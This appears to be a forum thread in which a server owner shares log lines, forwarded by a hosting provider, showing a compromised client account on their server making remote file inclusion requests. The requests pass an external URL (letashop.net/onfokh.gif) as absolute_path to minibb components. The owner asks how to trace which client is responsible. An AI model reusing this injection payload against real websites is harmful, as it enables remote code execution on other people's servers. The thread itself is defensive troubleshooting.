HELP - Need help identifying what user is doing something

n000b

Well-Known Member
Apr 7, 2005
142
0
166
Hi,

My dedicated server provider just sent me a policy enforcement notice, apparently someone on my server is trying to hack/crack another website. They sent me this:
<my ip> - - [30/May/2007:14:12:14 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"

<my ip> - - [30/May/2007:14:12:29 +0200] "GET /~goober/n0h4x0rz/components/com_minibb.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"

<my ip> - - [30/May/2007:14:12:43 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
<my ip> - - [30/May/2007:14:15:08 +0200] "GET /~goober/n0h4x0rz/components/minibb/index.php?absolute_path=http://letashop.net/onfokh.gif? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"


They are from the server that is being hacked/cracked.


How/where do I look to find out who is doing this on my server?

Thanks :)
 

approx

Well-Known Member
Mar 6, 2007
59
0
156
1 of your client is cracked. tell them to update the patch of the software that he used. Don't you install mod_security?
 

n000b

Well-Known Member
Apr 7, 2005
142
0
166
Hi,

Thanks, I know one of the clients has been cracked - I'm trying to figure out which client! :)

Edit: would the server even keep logs of outgoing requests? I'm completely lost on how to track this issue!
 
Last edited:

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
2,217
4
193
Minneapolis, MN